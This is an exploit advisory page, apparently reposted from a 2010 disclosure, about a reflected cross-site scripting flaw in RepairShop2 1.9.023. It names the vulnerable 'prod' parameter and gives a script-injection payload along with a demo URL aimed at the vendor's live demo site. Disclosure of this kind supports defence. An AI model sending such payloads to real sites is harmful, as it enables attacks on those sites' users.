RepairShop2 1.9.023 cross site scripting

2010.03.23
Credit: kaMtiEz
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 2.6/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 4.9/10
Wymagany dostęp: Zdalny
Złożoność ataku: Wysoka
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

############################################################################################################# ## RepairShop2 - cross site scripting ( XSS ) ## ## Author : kaMtiEz (kamzcrew@yahoo.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : 20 March, 2010 ## ############################################################################################################# [ Software Information ] [+] Vendor : http://www.realitymedias.com/ [+] Download : http://www.realitymedias.com/repairshop/?L=downloads [+] version : 1.9.023 [+] Vulnerability : XSS [+] Dork : syalalala [+] LOCATION : INDONESIA - JOGJA ############################################################################################################# [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/shop/?b=products.details&prod=[INDONESIANCODER] [ EXPLOIT ] "><script>alert(666)</script> [ DEMO ] http://n3x.realitymedias.com/rshop_demo/shop/?b=products.details&prod="><script>alert(666)</script> [ FIX ] :( ############################################################################################################# [ Thx TO ] [+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah [+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot [+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31 [ NOTE ] [+] Babe enyak adek i love u pull dah .. [+] to someone .. satu langkah lagi .. :D [+] CS-31 : kutunggu di kotaku :"> [ QUOTE ] [+] INDONESIANCODER still r0x [+] nothing secure ..

Referencje:

http://www.securityfocus.com/bid/38907
http://secunia.com/advisories/39043
http://packetstormsecurity.org/1003-exploits/repairshop2-xss.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top